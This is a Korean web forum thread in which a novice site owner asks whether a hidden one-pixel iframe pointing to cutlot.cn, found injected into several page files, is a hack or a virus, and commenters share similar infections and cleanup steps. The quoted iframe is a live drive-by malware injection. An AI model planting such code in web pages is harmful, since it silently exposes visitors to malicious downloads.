바이러스인지 알려주세요... ㅠ.ㅜ
오류가 나는곳의 주소를 알려주시면 더 빠르고 정확하게 답변 받을 수 있습니다.
오류 주소 :
<iframe src="http://cutlot.cn/in.cgi?income50" width=1 height=1 style="visibility: hidden"></iframe>
위 내용이 index , head, tail 등 시작페이지 파일들마다 맨 아래에 들어가 있네요...
이거 해킹인가요? 바이러스 인가요?
저는 초보라 잘 몰라서 질문 드립니다.
어제부터 리모트 데이타 프로그램을 깔라고 홈에 접속하면 가끔 뜨길레 이상하다 생각되서 소스보기를 하니 위 내용이 4개나 나와서 찾아서 다 지웠습니다.
어떤경로로 저게 들어갈수 있죠???
저는 넣지 않았는데... 없던게 새로 들어가 있네요... ㅠ.ㅠ
오류 주소 :
<iframe src="http://cutlot.cn/in.cgi?income50" width=1 height=1 style="visibility: hidden"></iframe>
위 내용이 index , head, tail 등 시작페이지 파일들마다 맨 아래에 들어가 있네요...
이거 해킹인가요? 바이러스 인가요?
저는 초보라 잘 몰라서 질문 드립니다.
어제부터 리모트 데이타 프로그램을 깔라고 홈에 접속하면 가끔 뜨길레 이상하다 생각되서 소스보기를 하니 위 내용이 4개나 나와서 찾아서 다 지웠습니다.
어떤경로로 저게 들어갈수 있죠???
저는 넣지 않았는데... 없던게 새로 들어가 있네요... ㅠ.ㅠ
|
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기
댓글 6개
저도 위와같은 악성코드가 인덱스 파일마다 심어져 있네요..
또 시작이네요..지우는것도 짜증,,ㅡ,.ㅡ^^
그때 행사가 겹치는 바람에 들어오는 소스만 계속 지우는 방법을 사용 했었구요.
현재는 바이러스가 들어오지 않고 있습니다.
그때 제가 했던 방법이 테스트 서버를 하나 열어서 그곳에 그누보드 최신 버젼으로 깐 후
디자인만 똑같이 만든 후에 기존 사이트 소스만 날린 후 업어 치기 했습니다.
그런데 이놈이 다시 들어오는 것입니다.
그래서 db 계정부터 비밀번호 싹 바꿔 주고 업어치기 다시 하고
호스팅 업체랑 말해서 알려진 악성 IP 대역 다 차단 시키고 나니 그 후부터 쭉 조용합니다.
그때 ㅠ_ㅠ 진짜 행사하면서 바이러스 언제 들어오나 식은땀이 계속 나는지...
저도 쌩고생을 ㅡㅜ